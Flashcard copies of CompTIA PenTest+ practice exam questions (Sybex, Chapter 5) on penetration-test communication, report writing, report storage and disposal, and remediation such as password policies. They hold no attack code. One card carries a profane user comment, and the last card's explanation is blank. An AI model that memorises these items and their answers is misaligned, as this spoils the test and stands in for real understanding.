Flashcards in “CompTIA PenTest+ Practice Test Chapter 5 Reporting and Communication (Sybex: Panek, Crystal, Tracy)”

1
Q

You have just completed a penetration test for a client. During the test, you used a variety of different tools to collect data and conduct exploits. Now you need to aggregate all of the data generated by these tools into a format that is consistent, correlated, and readable. What is this process called?

A.Attestation of findings
B.Normalization of data
C.De-escalation
D.De-confliction

A

B.Normalization of data

Explanation:
When you normalize the data from a penetration test, you aggregate all the data generated by all of the different tools and processes you used during the test and format it such that it is consistent and correlated. The goal is to make it such that the client can read the aggregated data and understand what happened during the test and when.

2
Q

You have just completed a penetration test for a client and are now creating a written report of your findings. You need to make sure the reader understands that you followed the PCI DSS standard while conducting the test. In which part of the report should you include this information?

A.Findings
B.Remediation
C.Metrics and Measures
D.Methodology

A

D.Methodology

Explanation:
The final report you write for a penetration test should include a section entitled Methodology. In this section, you describe the penetration testing methodology you used to conduct the test. In this scenario, this would be the appropriate place to indicate that the PCI DSS standard was followed to conduct the test.

3
Q

One of the goals of communication between the tester and the client during a penetration test is to ensure that both parties clearly understand the current security state of the network. Which of the following terms best describes this shared understanding?

A.Situational awareness
B.De-escalation
C.De-confliction
D.Goal reprioritization

A

A.Situational awareness

Explanation:
Among other things, the term situational awareness refers to a state of shared understanding between the client and the tester regarding the security posture of the client’s network.

4
Q

During a penetration test, the client organization’s network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company’s web server. The administrator calls the penetration tester to verify that the attack is part of the penetration test and not coming from a real attacker. What is this process called?

A.Normalization of data
B.Situational awareness
C.De-confliction
D.Goal reprioritization

A

C.De-confliction

Explanation:
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.

5
Q

During a penetration test, the client organization begins to receive complaints from customers indicating that the organization’s web server is very slow to respond or even crashes at times. The network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company’s web server. Sales are being lost, so the administrator calls the penetration tester and asks them to stop the attack. What is this communication path called?

A.Situational awareness
B.De-escalation
C.De-confliction
D.Goal reprioritization

A

B.De-escalation

Explanation:
The term de-escalation refers to the process of communicating between the client and the tester to cease exploits used during the penetration test because of the adverse effects they may be having on the network.

6
Q

Your organization is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to ensure everyone knows what the others are doing. What is this process called?

A.Situational awareness
B.Metrics and measures
C.De-confliction
D.Normalization of data

A

A.Situational awareness

Explanation:
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that every team member is aware of what the others are doing.

7
Q

Your organization is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to coordinate the timing of activities, including reconnaissance, enumeration, exploits, and so on. What is this process called?

A.Situational awareness
B.De-escalation
C.De-confliction
D.Normalization of data

A

A.Situational awareness

Explanation:
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are coordinated to occur at the appropriate time.

8
Q

During a penetration test, the client organization begins to receive complaints from remote workers indicating that the organization’s VPN is down. The network administrator discovers a local area network denial (LAND) attack underway that is aimed at the company’s VPN server at the edge of the network. The remote workers are unable to work, so the administrator calls the penetration tester and asks them to dial back the attack. What is this communication path called?

A.Situational awareness
B.De-escalation
C.De-confliction
D.Goal reprioritization

A

B.De-escalation

Explanation:
The term de-escalation refers to the process of communicating between the client and the tester to dial back the intensity of exploits used during the penetration test because of the adverse effects they may be having on the network.

9
Q

During a penetration test, the client organization’s network administrator discovers a teardrop attack underway that is aimed at the company’s perimeter router. The administrator calls the penetration tester to see whether the attack is part of the penetration test. What is this communication path called?

A.Situational awareness
B.Metrics and measures
C.De-confliction
D.Normalization of data

A

C.De-confliction

Explanation:
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.

10
Q

Your organization is conducting a black box penetration test for a client. There are three testers on your team. At the beginning of the process, you have a team meeting to plan how the test will be conducted, when certain activities will occur, and which team members will be responsible for performing specific tasks. What is this process called?

A.De-confliction
B.De-escalation
C.Situational awareness
D.Goal reprioritization

A

C.Situational awareness

Explanation:
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are planned and coordinated to occur at the appropriate time.

11
Q

During a penetration test, an individual is caught trying to piggyback into the client organization’s facility. The trespasser claims to be a penetration tester and insists on being released. Prior to pressing criminal charges, a member of the client’s IT staff calls the penetration tester to determine whether the trespasser is really a member of the penetration testing team. What is this communication path called?

A.Goal reprioritization
B.De-confliction
C.Situational awareness
D.De-escalation

A

B.De-confliction

Explanation:
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is actually part of the authorized penetration test or whether it has been instigated by a third-party hacker.

12
Q

During a penetration test, a tester gains physical access to the client’s facility using pretexting and is able to trigger a fail-open event for all of the organization’s electronic locking systems. As a result, all of the doors in the facility are unlocked. The client’s internal security team calls the penetration tester and asks them to stop the attack and immediately re-enable the door locks. What is this process called?

A.Situational awareness
B.Goal reprioritization
C.De-confliction
D.De-escalation

A

D.De-escalation

Explanation:
The term de-escalation refers to the process of communicating between the client and the tester to dial back the intensity of exploits or even stop them altogether because of unsafe situations they may be causing.

13
Q

Which of the following best describes a trusted agent during a penetration test?

A.A tester who secretly penetrates the target organization by applying for a job there
B.An individual within the target organization who has a direct line of communication with the penetration tester
C.An individual on the penetration testing team who has a direct line of communication with the IT staff of the target organization
D.A representative of the local law enforcement agency who has been briefed about the test by the penetration tester

A

B.An individual within the target organization who has a direct line of communication with the penetration tester

Explanation:
The term trusted agent refers to an individual within the target organization, typically an IT administrator or a manager, who has a direct line of communication with the penetration tester. This individual is usually responsible for de-confliction and de-escalation communications between the client and the tester.

14
Q

You are conducting a black box penetration test for a client. The reconnaissance phase of the test is complete, and you are ready to move on to the next phase. Before doing so, you communicate with the client and inform them that the test is moving from one phase to another. Which type of communication trigger was used in this scenario?

A.Stages
B.Critical findings
C.Communication path
D.Indicators of prior compromise

A

A.Stages

Explanation:
A stages communication trigger happens when the penetration test progresses from one phase to another.

15
Q

You are conducting a gray box penetration test for a client. During the test, you discover that many users’ Windows desktop systems haven’t been patched properly and are still vulnerable to several common types of ransomware. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that their systems are vulnerable. Which type of communication trigger was used in this scenario?

A.Risk rating
B.Critical findings
C.Findings and remediation
D.Indicators of prior compromise

A

B.Critical findings

Explanation:
A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

16
Q

You are conducting a white box penetration test for a client. During the test, you discover a hidden backdoor administrator account on one of the client’s Active Directory domain controllers. You check the logs of the domain controller and find that the backdoor account is being actively used on a daily basis. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that their server has been compromised. Which type of communication trigger was used in this scenario?

A.Stages
B.Critical findings
C.Communication path
D.Indicators of prior compromise

A

D.Indicators of prior compromise

Explanation:
An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

17
Q

You are conducting a black box penetration test for a client. The enumeration phase of the test is complete, and you are ready to begin exploiting vulnerable systems. Before doing so, you communicate with the client and inform them that the test is transitioning. Which type of communication trigger was used in this scenario?

A.Risk rating
B.Critical findings
C.Findings and remediation
D.Stages

A

D.Stages

Explanation:
A stages communication trigger happens when the penetration test progresses from one phase to another.

18
Q

You are conducting a white box penetration test for a client. During the test, you notice outgoing network traffic consistent with a distributed denial of service (DDoS) attack. You suspect that internal systems have been infected with malware, creating an amplifier network for the attack. Instead of waiting until the end of the test, you immediately communicate with the client to warn them. Which type of communication trigger was used in this scenario?

A.Stages
B.Indicators of prior compromise
C.Findings and remediation
D.Critical findings

A

B.Indicators of prior compromise

Explanation:
An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

19
Q

You are conducting a gray box penetration test for a client. During the test, you discover that help desk technicians are using authenticated but unencrypted FTP connections over the Internet to transfer files to computers located at remote branch-office sites. As such, their credentials are potentially being exposed on the public network. Even though this represents a tempting target for you to exploit, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that privileged credentials are potentially being exposed on the Internet. Which type of communication trigger was used in this scenario?

A.Stages
B.Critical findings
C.Communication path
D.Indicators of prior compromise

A

B.Critical findings

Explanation:
A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

20
Q

You are conducting a black box penetration test for a client. The test is now complete, and you are ready to begin cleaning up after yourself. Before doing so, you communicate with the client and inform them that the test is complete and to be aware that cleanup activities will be occurring. Which type of communication trigger was used in this scenario?

A.Risk rating
B.Critical findings
C.Stages
D.Indicators of prior compromise

A

C.Stages

Explanation:
A stages communication trigger happens when the penetration test progresses from one phase to another.

21
Q

You are conducting a black box penetration test for a small financial institution. Using pretexting, you are able to gain access to the target facility by posing as a copier repair person. As you walk through the building, you notice that almost all employees have written their (overly complex) passwords on sticky notes and posted them on their computer monitors and keyboards. Some are so obvious that they can be seen by keen-eyed customers. This represents a tempting target for you to exploit; however, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that credentials are plainly visible. Which type of communication trigger was used in this scenario?

A.Indicators of prior compromise
B.Critical findings
C.Communication path
D.Stages

A

B.Critical findings

Explanation:
A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

22
Q

You are conducting a white box penetration test for a client. During the test, you notice that all end-user workstations are configured with only the default Windows antivirus scanner. You further notice that many end users use an application to complete their daily work that is a known Trojan horse commonly used to create a botnet. Instead of waiting until the end of the test, you immediately communicate with the client to warn them. Which type of communication trigger was used in this scenario?

A.Indicators of prior compromise
B.Critical findings
C.Communication path
D.Stages

A

A.Indicators of prior compromise

Explanation:
An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

23
Q

You are conducting a PCI DSS penetration test for a client. During the testing process, a dangerous ransomware exploit begins to spread between networks around the world. The client asks you to halt the PCI DSS penetration test and instead test to see whether their network is vulnerable to this new type of malware. Which term best describes what happened in this scenario?

A.Situational awareness
B.Goal reprioritization
C.Indicators of prior compromise
D.Attestation of findings

A

B.Goal reprioritization

Explanation:
Goal reprioritization occurs when either the client or the tester decides to change the focus of the penetration test from the agreed-upon scope after the test has already started. In this scenario, the PCI DSS test is being modified to include testing for vulnerability to the new type of ransomware.

24
Q

You are conducting a gray box penetration test for a client. During the testing process, you notice that their wireless network uses weak encryption with a preshared key (00000001) that is easy to brute-force crack. Further, you notice that the client has implemented omnidirectional access points throughout the facility. You suspect that the wireless signal is emanating far outside the building. You contact the client and recommend that the test be modified to include testing of the Wi-Fi network from a black box perspective. Which term best describes what happened in this scenario?

A.Goal reprioritization
B.Attestation of findings
C.Indicators of prior compromise
D.Situational awareness

A

A.Goal reprioritization

Explanation:
Goal reprioritization occurs when either the client or the tester decides to change the focus of the penetration test from the agreed-upon scope after the test has already started. In this scenario, a black box component has been added to a traditional gray box test.

25
Q

Which of the following terms refers to the process of gathering data produced by the various tools in a penetration test and formatting the data in a consistent manner such that it can be easily read?

A.Attestation of findings
B.Normalization of data
C.Remediation
D.Disposition of reports

A

B.Normalization of data

Explanation:
When you normalize the data from a penetration test, you aggregate all the data generated by all of the different tools and processes you used during the test and format it such that it is consistent and easy to understand.

26
Q

You are generating a written report of findings after a penetration test. During the test, you followed the NIST 800-115 standard. In which section of the report should you include this information?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures

A

B.Methodology

Explanation:
When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the Methodology section. In this example, you would inform the reader that you used the NIST 800-115 methodology.

27
Q

You are generating a written report of findings after a penetration test. In which section of the report should you provide the reader with a high-level synopsis of the test and the results?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures

A

A.Executive summary

Explanation:
When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.

28
Q

You are generating a written report of findings after a penetration test. In which section should you report risk ratings?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion

A

D.Metrics and measures

Explanation:
When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.

29
Q

Which section of a written report of penetration test findings is intended to be read by less-technical audiences?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion

A

A.Executive summary

Explanation:
When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.

30
Q

THIS IS A DUMB FUCKING QUESTION

You are generating a written report of findings after a penetration test. During the test, you followed the specifications of the EC-Council for its Certified Ethical Hacker (CEH) certification. Where should this information be included in your report?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion

A

B.Methodology

Explanation:
When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the Methodology section. In this example, you would inform the reader that you used the EC-Council’s CEH methodology.

31
Q

You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven’t been patched properly and are susceptible to the WannaCry ransomware. Where should you include this information in your report?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion

A

C.Findings and remediation

Explanation:
When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them.

32
Q

You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven’t been patched properly and are susceptible to the WannaCry ransomware. To fix this, the client needs to install the MS17-010 – Critical update from Microsoft. Where should you include this recommendation in your report?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion

A

C.Findings and remediation

Explanation:
When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them and what the client can do to fix the problem. In this example, you should recommend they install the MS17-010 – Critical update from Microsoft in this section.

33
Q

You are generating a written report of findings after a penetration test. You cross-reference each vulnerability you found in the test against the Common Vulnerabilities and Exposures (CVE) database to assign it a qualitative risk rating of Low, Medium, High, or Critical. Where should these risk ratings be included in the report?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion

A

D.Metrics and measures

Explanation:
When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.

34
Q

You are generating a written report of findings after a penetration test. Based on the results of the test, you have created a list of recommendations you feel the client should focus on. Where should you include your recommendations in the report?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion

A

E.Conclusion

Explanation:
When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section.

35
Q

You are generating a written report of findings after a penetration test. In which section of the report should you consider the risk appetite of the client when deciding which information to include?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion

A

C.Findings and remediation

Explanation:
The information you include in the Findings and Remediation section of your written report of findings will usually be constrained by the client’s risk appetite. For example, an organization with a higher risk appetite may want you to include only information about high-risk or critical-risk vulnerabilities you discovered and not report medium- or low-risk vulnerabilities.

36
Q

You are generating a written report of findings after a penetration test. Based on the sheer number of vulnerabilities you discovered in the test, you feel that the client should undergo a follow-up penetration test within the next three months to verify that the issues have been remediated. Where should you include this recommendation in the report?

A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion

A

E.Conclusion

Explanation:
When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section, including when you think the client should conduct follow-up penetration tests.

37
Q

You have just finished writing a report of findings for a client after a penetration test. How long is your organization required to store the document after the test is complete?

A.Six months
B.One year
C.Five years
D.Depends on the client contract

A

D.Depends on the client contract

Explanation:
Typically, there is no legally mandated storage time for reports after a penetration test is complete. The amount of time you are required to store the client’s report will usually be governed by your contract with the client.

38
Q

You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?

A.Print a hard copy and keep it in a file folder on your desk.
B.Save it to a flash drive that is stored in a pen holder on your desk.
C.Burn it to a rewritable optical disc and store it in a desk drawer.
D.Save it to an encrypted file on a file server.

A

D.Save it to an encrypted file on a file server.

Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing the report in an encrypted file on a file server would make it more difficult for the file to be stolen than the other options listed.

39
Q

You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?

A.Print a hard copy and store it in a locked filing cabinet that has been bolted to the floor.
B.Save it to your Google Drive account.
C.Save it in a file on your laptop.
D.Burn it to a rewritable optical disc and store it in a CD caddy on your desk.

A

A.Print a hard copy and store it in a locked filing cabinet that has been bolted to the floor.

Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing a hard copy of the report in a locked filing cabinet that has been bolted to the floor would make it more difficult for the report to be stolen than the other options listed.

40
Q

You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?

A.Burn the report to an optical disk and store it in a locked safe bolted to your desk.
B.Save the file to an encrypted flash drive.
C.Copy the file to your phone.
D.Save the report to a file on your workstation’s desktop.

A

A.Burn the report to an optical disk and store it in a locked safe bolted to your desk.

Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, burning the file to an optical disc and storing it in a secured safe would make it more difficult for the report to be stolen than the other options listed.

41
Q

You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?

A.Burn the report to an optical disk and keep it in a hanging file folder in your desk.
B.Save the file to an encrypted flash drive and store it in a locked cabinet.
C.Copy the file to your phone.
D.Save the report to your organization’s FTP server.

A

B.Save the file to an encrypted flash drive and store it in a locked cabinet.

Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, saving the file to an encrypted flash drive and storing it in a secured cabinet would make it more difficult for the report to be stolen than the other options listed.

42
Q

You need to dispose of several penetration test reports from old clients. The files are stored on a removable hard drive that is stored in a locked safe. Which of the following is the best way to do this?

A.Delete the files from the drive.
B.Use the fdisk utility to repartition the drive.
C.Use disk wiping software on the drive.
D.Reformat the drive.

A

C.Use disk wiping software on the drive.

Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, wiping the drive will make it much harder to recover the files from the drive.

43
Q

You need to dispose of several penetration test reports from old clients. Hard copies of the reports are stored in a locked filing cabinet that has been bolted to the floor. Which of the following is the best way to do this?

A.Put the reports in the garbage.
B.Put the reports in the recycle bin.
C.Stack the reports upside down by your team’s printer for use as “scratch paper.”
D.Shred the report in a cross-cut shredder.

A

D.Shred the report in a cross-cut shredder.

Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, shredding the documents will make it much harder to recover the data from the reports.

44
Q

You need to dispose of several penetration test reports from old clients. The files are stored on flash drives that are stored in a locked cabinet. Which of the following is the best way to do this?

A.Smash the drives with a hammer.
B.Delete the files from the drives.
C.Use the Disk Management utility to repartition the drives.
D.Reformat the drives using File Explorer in Windows.

A

A.Smash the drives with a hammer.

Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying inexpensive flash drives will make it much harder to recover the data from the reports.

45
Q

You need to dispose of several penetration test reports from old clients. The files are stored on rewritable optical discs that are stored in a locked cabinet. Which of the following is the best way to do this?

A.Delete the files from the discs.
B.Shred the discs.
C.Delete the files and then save new files to the discs.
D.Reformat the discs.

A

B.Shred the discs.

Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying optical discs will make it much harder to recover the data from the reports.

46
Q

You have just concluded a penetration test for a client that makes extensive use of work-at-home employees. The employees use a VPN connection. During the test, you were able to use social engineering to compromise an employee’s VPN connection and gain access to the internal network. As a mitigation strategy, you recommend that the client implement multifactor authentication for all VPN connections. What type of solution is this?

A.Technological
B.People
C.Process
D.Tactical

A

A.Technological

Explanation:
Implementing multifactor authentication for VPN connections is an example of a technological mitigation strategy.

47
Q

You have just concluded a penetration test for a client. During the test, you were able to use social engineering techniques to gain access to the server room inside the client’s facility. To address this vulnerability, you recommend that the client require security awareness training for all employees every six months. What type of solution is this?

A.Technological
B.People
C.Process
D.Tactical

A

B.People

Explanation:
Implementing regular security awareness training for all employees is an example of a people-based mitigation strategy.

48
Q

You have just concluded a penetration test for a client. During the test, you were able to use stale user accounts associated with former employees to gain access to a sensitive file server. To address this vulnerability, you recommend that the client remove user accounts whenever an employee leaves the organization. What type of solution is this?

A.Technological
B.People
C.Process
D.Strategic

A

C.Process

Explanation:
Implementing off-boarding processes for employees when they leave the organization is an example of a process-based mitigation strategy.

49
Q

You have just concluded a penetration test for a client. During the test, you discovered that system administrators were using unencrypted Telnet sessions to remotely manage sensitive servers. You were able to sniff network traffic and capture administrative credentials from these connections. To address this vulnerability, you recommend that the client require all IT staff to pass a network security certification exam. What type of solution is this?

A.Technological
B.People
C.Process
D.Strategic

A

B.People

Explanation:
Requiring IT staff members to pass a network security certification exam is an example of a people-based mitigation strategy.

50
Q

You have just concluded a penetration test for a client. During the test, you were able to use John the Ripper to brute force an administrative password on a sensitive Windows file server. To address this vulnerability, you recommend that the client implement Group Policy settings that require complex passwords as well as lock the system after three incorrect logon attempts. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

A

A.Technological

Explanation:
Requiring complex passwords and implementing account restrictions are examples of technological mitigation strategies.

51
Q

You have just concluded a penetration test for a client. The client has more than 2,000 employees, but only two of them are network administrators. During the test, you were able to quickly overwhelm them with the sheer volume of your attacks. To address this vulnerability, you recommend that the client hire additional network administrators who have cybersecurity credentials and experience. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

A

B.People

Explanation:
Hiring additional IT staff members who have experience with cybersecurity is an example of a people-based mitigation strategy.

52
Q

You have just concluded a penetration test for a client. During the test, you discovered that the organization’s employees made extensive use of a shared Google Drive account to collaborate. You were able to use a social engineering exploit to get access to the shared account and access sensitive files. To address this vulnerability, you recommend that the client disallow this practice among employees. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

A

C.Process

Explanation:
Forbidding employees from using external cloud-based services such as Google Drive is an example of a process-based mitigation strategy.

53
Q

You have just concluded a penetration test for a client. During the test, you were able to gain access to the client’s physical facility by tailgating with a group of employees. To address this vulnerability, you recommend that the client implement a man-trap locking door at the entrance to the facility. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

A

A.Technological

Explanation:
Implementing a mantrap at the main entrance is an example of a technological mitigation strategy.

54
Q

You have just concluded a penetration test for a client. During the test, you were able to gain access to the client’s wireless network using Aircrack-ng while sitting in your car in a parking lot across the street. To address this vulnerability, you recommend that the client implement directional wireless network antennas and also manipulate the power level of the access points to prevent signal emanation. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

A

A.Technological

Explanation:
Implementing directional wireless antennas and manipulating access point power levels to prevent signal emanation are examples of technological mitigation strategies.

55
Q

You have just concluded a penetration test for a client. During the test, you were able to use social engineering to convince the organization’s accounts payable clerk to send a large ACH payment to a fictitious bank account. To address this vulnerability, you recommend that the client implement division of duties such that two individuals must sign off on all payouts. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

A

C.Process

Explanation:
Requiring multiple sign-offs on payouts is an example of a process-based mitigation strategy.

56
Q

You have just concluded a penetration test for a client. During the test, you were able to use a phishing exploit to collect authentication credentials from several employees. To address this vulnerability, you recommend that the client conduct a mandatory security awareness training session for all employees. What type of solution is this?

A.Technological
B.People
C.Process
D.Scalable

A

B.People

Explanation:
Conducting security awareness training with employees is an example of a people-based mitigation strategy.

57
Q

You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. What could you recommend to remediate this problem?

A.Encrypt the passwords.
B.Implement password complexity requirements.
C.Implement intruder lockout.
D.Randomize the local Administrator credentials.

A

D.Randomize the local Administrator credentials.

Explanation:
Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to simply randomize those credentials. Otherwise, compromising the local administrator password on one desktop would expose all the other desktops in the organization.

58
Q

You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. When you report this to the client, they indicate that are aware of this and that they did this deliberately to reduce management complexity. What solution could you recommend that would remediate the vulnerability without increasing management complexity?

A.Randomize the local Administrator credentials.
B.Implement LAPS.
C.Make all local Windows users members of the local Administrators group.
D.Make all Windows domain users members of the Domain Administrators group.

A

B.Implement LAPS.

Explanation:
Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to implement the Local Administrator Password Solution (LAPS) from Microsoft. This solution periodically randomizes local administrator passwords and saves those secrets in Active Directory.

59
Q

You have just concluded a penetration test for a client. In your findings, you report that you were able to compromise several users’ Windows accounts because they used passwords such as password, aaa, and 1234. Which of the following domain Group Policy settings could you recommend they implement to prevent weak password complexity? (Choose two.)

A.Store passwords using reversible encryption.
B.Password must meet complexity requirements.
C.Minimum password length.
D.Certificate path validation settings.
E.Certificate services client – Auto-enrollment.

A

B.Password must meet complexity requirements.
C.Minimum password length.

Explanation:
The “Password must meet complexity requirements” and the “Minimum password length” Group Policy settings can be used to enforce a degree of password complexity. By default, the “Password must meet complexity requirements” policy requires passwords be at least six characters long and contain characters from three of the following four categories: uppercase letters, lowercase letters, numbers, and special characters. The minimum password length defines the least number of characters that a password may contain.

60
Q

Which of the following Windows Group Policy settings can be used to prevent a user from reusing the same password over and over?

A.Enforce password history
B.Store passwords using reversible encryption
C.Minimum password length
D.Password must meet complexity requirements

A

A.Enforce password history

Explanation:
The “Enforce password history” Group Policy setting determines the number of unique new passwords that a user must use before an old password can be reused again. Configuring this policy helps enhance security by preventing users from reusing old passwords.

61
Q

Which of the following Windows Group Policy settings determines how long a user can keep the same password before being required to change it to a new one?

A.Enforce password history
B.Minimum password length
C.Minimum password age
D.Maximum password age

A

D.Maximum password age

Explanation:
The “Maximum password age” Group Policy setting determines how long a user can keep the same password before being required to change it to a new one. Once that time period has elapsed, the user is forced to create a new password.

62
Q

Which of the following Windows Group Policy settings determines how long a user must keep the same password before being allowed to change it to a new one?

A.Enforce password history
B.Minimum password length
C.Minimum password age
D.Maximum password age

A

C.Minimum password age

Explanation:
The “Minimum password age” Group Policy setting determines how long a user must keep the same password before being allowed to change it to a new one. Until that time period has elapsed, the user is forced to keep the same password. This prevents users from making constant changes to their password in an attempt to circumvent the “Enforce password history policy” setting.

63
Q

You have just concluded a penetration test for a client. In your findings, you report that users are allowed to keep the same password indefinitely, which increases the likelihood that they will be compromised at some point. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to fix this issue?

A.chage
B.chmod
C.chgroup
D.chown

A

A.chage

Explanation:
The chage command can be used on Linux systems to configure password aging for user accounts.

64
Q

You have just concluded a penetration test for a client. In your findings, you report that brute-force password attacks against Windows domain user accounts were successful because nothing stopped the password-cracking software from trying password after password for a given user. Which of the following Windows domain Group Policy settings could you recommend the client implement to remediate this issue?

A.Enforce password history
B.Password must meet complexity requirements
C.Store passwords using reversible encryption
D.Account lockout threshold

A

D.Account lockout threshold

Explanation:
The “Account lockout threshold” Group Policy setting determines the number of failed logon attempts a user is allowed to make before the account is locked. A locked account can’t be used again until it is unlocked by an administrator or the lockout period for the account has elapsed. This policy setting can help prevent brute-force attacks by locking an account after only a few guessing attempts.

65
Q

Which Windows Group Policy setting determines how long a user’s account will stay locked if the wrong password has been entered too many times?

A.Maximum password age
B.Account lockout duration
C.Account lockout threshold
D.Minimum password age

A

B.Account lockout duration

Explanation:
The “Account lockout duration” Group Policy setting determines how long a locked account remains locked before being automatically unlocked. This policy setting helps prevent brute-force attacks by severely increasing the amount of time required to conduct the attack.

66
Q

Which Windows Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0?

A.Account lockout duration
B.Account lockout threshold
C.Reset account lockout counter after
D.Store passwords using reversible encryption

A

C.Reset account lockout counter after

Explanation:
The “Reset account lockout counter after” Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0. This policy setting helps prevent brute-force attacks by significantly increasing the amount of time required to conduct the attack.

67
Q

You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their work is complete. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to automatically lock user accounts after a certain time?

A.chage
B.chmod
C.chgroup
D.chown

A

A.chage

Explanation:
The chage command can be used on Linux systems to automatically lock user accounts after a certain time. This prevents stale user accounts from being used by an attacker or disgruntled former employee to gain unauthorized access.

68
Q

Which of the following Windows Group Policy settings should never be enabled?

A.Store passwords using reversible encryption
B.Password must meet complexity requirements
C.Minimum password length
D.Certificate path validation settings

A

A.Store passwords using reversible encryption

Explanation:
